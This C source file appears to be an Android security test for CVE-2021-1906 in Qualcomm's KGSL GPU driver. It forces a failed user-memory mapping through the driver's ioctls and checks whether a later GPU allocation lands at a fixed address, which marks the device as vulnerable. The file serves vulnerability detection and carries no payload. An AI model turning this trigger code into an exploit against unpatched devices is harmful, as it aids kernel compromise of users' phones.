/**
 * Copyright (C) 2021 The Android Open Source Project
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

/*
 * CVE-2021-1906
 */

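/*
 * CVE-2021-1906 covers improper handling of GPU address deregistration
 * when mapping user memory fails in the Qualcomm KGSL driver.  The test
 * below forces IOCTL_KGSL_MAP_USER_MEM to fail over a large, fixed
 * address range and then checks whether the next allocation lands exactly
 * at the end of that range (EXPLOIT_VULN_ADDR), which would indicate that
 * the failed mapping's GPU address range was never released.
 */
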
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <unistd.h>

#include "../includes/common.h"
#include "msm_kgsl.h"

static void *code_page_cpu_addr = MAP_FAILED;
static unsigned long code_page_gpu_addr = 0;

#define int64 int64_t
/* GPU address that a follow-up allocation lands on when the bug is present. */
#define EXPLOIT_VULN_ADDR 0xdff00000

unsigned int ctx_id = 0;

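/* Allocates GPU memory through IOCTL_KGSL_GPUMEM_ALLOC_ID; the id returned
 * in *alloc is later used to mmap the buffer and to look up its GPU
 * address. */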
int gpu_mem_alloc_id(int fd, int size, int flags,
                     struct kgsl_gpumem_alloc_id *alloc) {
  int ret = -1;
  alloc->flags = flags;
  alloc->size = size;

  ret = ioctl(fd, IOCTL_KGSL_GPUMEM_ALLOC_ID, alloc);
  return ret;
}

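/* Frees a KGSL allocation identified by its GPU address via
 * IOCTL_KGSL_SHAREDMEM_FREE. */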
int gpu_sharedmem_free(int fd, unsigned long gpu_addr) {
  struct kgsl_sharedmem_free addr;
  int ret = -1;
  addr.gpuaddr = gpu_addr;
  ret = ioctl(fd, IOCTL_KGSL_SHAREDMEM_FREE, &addr);
  return ret;
}

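/* Allocates GPU memory through IOCTL_KGSL_GPUMEM_ALLOC and returns the GPU
 * address chosen by the driver, or (unsigned long)-1 on failure. */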
unsigned long gpu_mem_alloc(int fd, int size, unsigned int flags) {
  struct kgsl_gpumem_alloc alloc = {0};
  alloc.size = size;
  alloc.flags = flags;

  if (ioctl(fd, IOCTL_KGSL_GPUMEM_ALLOC, &alloc) < 0) {
    return -1;
  }
  return alloc.gpuaddr;
}

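/* Looks up an existing allocation by id via IOCTL_KGSL_GPUMEM_GET_INFO,
 * filling in its GPU address and size. */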
int gpu_mem_get_info_from_id(int fd, int id,
                             struct kgsl_gpumem_get_info *info) {
  int ret = -1;
  info->id = id;
  info->gpuaddr = 0;
  ret = ioctl(fd, IOCTL_KGSL_GPUMEM_GET_INFO, info);
  return ret;
}

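/* Opens /dev/kgsl-3d0 and creates a GPU draw context.  Returns the device
 * fd, or -1 on failure; the new context id is stored in the global ctx_id. */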
int kgsl_init() {
  int kgsl = open("/dev/kgsl-3d0", O_RDWR | O_LARGEFILE);
  if (kgsl < 0) {
    return -1;
  }

  struct kgsl_drawctxt_create ctxc;
  ctxc.flags = 0x1010D2;
  ctxc.drawctxt_id = 0;
  if (ioctl(kgsl, IOCTL_KGSL_DRAWCTXT_CREATE, &ctxc) < 0) {
    close(kgsl);
    return -1;
  }
  ctx_id = ctxc.drawctxt_id;
  return kgsl;
}

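/* Maps a user buffer into the GPU with IOCTL_KGSL_MAP_USER_MEM using
 * memtype KGSL_USER_MEM_TYPE_ADDR.  With KGSL_MEMFLAGS_USE_CPU_MAP the
 * driver is asked to reuse the CPU virtual address as the GPU address.
 * The resulting GPU address, if any, is written to *gpu_addr. */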
int gpu_map_user_mem(int fd, uintptr_t addr, size_t size, size_t offset,
                     unsigned int flags, unsigned long *gpu_addr) {
  struct kgsl_map_user_mem user_mem = {0};
  int result = 0;

  user_mem.fd = -1;
  user_mem.gpuaddr = 0;
  user_mem.len = size;
  user_mem.offset = offset;
  user_mem.hostptr = addr;
  user_mem.flags = flags;
  user_mem.memtype = KGSL_USER_MEM_TYPE_ADDR;

  result = ioctl(fd, IOCTL_KGSL_MAP_USER_MEM, &user_mem);
  if (gpu_addr) {
    *gpu_addr = user_mem.gpuaddr;
  }
  return result;
}

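/* Allocates a GPU-read-only command buffer, maps it into the process
 * through the kgsl fd (the allocation id is encoded in the mmap offset),
 * and returns both the CPU and GPU addresses of the buffer. */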
int create_code_page(int fd, int size, void **cpu_addr,
                     unsigned long *gpu_addr) {
  struct kgsl_gpumem_alloc_id alloc = {0};
  struct kgsl_gpumem_get_info info = {0};
  void *cpu_mapping = MAP_FAILED;

  if (gpu_mem_alloc_id(fd, size,
                       KGSL_MEMFLAGS_USE_CPU_MAP | KGSL_MEMFLAGS_GPUREADONLY |
                           KGSL_MEMTYPE_COMMAND,
                       &alloc) < 0) {
    return -1;
  }

  cpu_mapping =
      mmap(NULL, size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, alloc.id << 12);
  if (cpu_mapping == MAP_FAILED) {
    return -1;
  }

  if (gpu_mem_get_info_from_id(fd, alloc.id, &info) < 0) {
    return -1;
  }

  *cpu_addr = cpu_mapping;
  *gpu_addr = info.gpuaddr;
  return 0;
}

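/* Sets up the failing user-memory mapping: two anonymous pages are mapped
 * at the fixed CPU address `start`, the second page is made PROT_NONE, and
 * IOCTL_KGSL_MAP_USER_MEM is asked to map the whole [start, end) range
 * with KGSL_MEMFLAGS_USE_CPU_MAP.  The ioctl is expected to fail partway,
 * since the requested range is neither fully mapped nor fully accessible;
 * on vulnerable kernels the GPU address range reserved for the mapping is
 * not released when that failure happens. */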
void trigger(int fd, uintptr_t start, uintptr_t end) {
  void *hostptr = mmap((void *)start, 2 * PAGE_SIZE, PROT_READ | PROT_WRITE,
                       MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
  mprotect((void *)((uintptr_t)hostptr + PAGE_SIZE), PAGE_SIZE, PROT_NONE);

  gpu_map_user_mem(fd, (uintptr_t)hostptr, end - start, 0,
                   KGSL_MEMFLAGS_USE_CPU_MAP, NULL);
  munmap(hostptr, 2 * PAGE_SIZE);
}

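/* PoC flow: allocate and immediately free a one-page GPU buffer to obtain
 * a free GPU address, force a user-memory mapping over the range from that
 * address up to EXPLOIT_VULN_ADDR to fail, then allocate a 0x600000-byte
 * buffer.  If the new buffer lands exactly at EXPLOIT_VULN_ADDR, the failed
 * mapping's address range was not deregistered and the device is reported
 * as vulnerable. */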
int main(void) {
  int kgsl_fd = kgsl_init();
  unsigned long gpu_addr = 0;
  unsigned long next_gpu_addr = 0;

  FAIL_CHECK(!(kgsl_fd < 0));

  if (create_code_page(kgsl_fd, 4 * PAGE_SIZE, &code_page_cpu_addr,
                       &code_page_gpu_addr) < 0) {
    close(kgsl_fd);
    return EXIT_FAILURE;
  }

  next_gpu_addr = gpu_mem_alloc(kgsl_fd, PAGE_SIZE, 0);
  gpu_sharedmem_free(kgsl_fd, next_gpu_addr);
  trigger(kgsl_fd, next_gpu_addr, EXPLOIT_VULN_ADDR);
  gpu_addr = gpu_mem_alloc(kgsl_fd, 0x600000, 0);

  close(kgsl_fd);
  return (gpu_addr == EXPLOIT_VULN_ADDR) ? EXIT_VULNERABLE : EXIT_SUCCESS;
}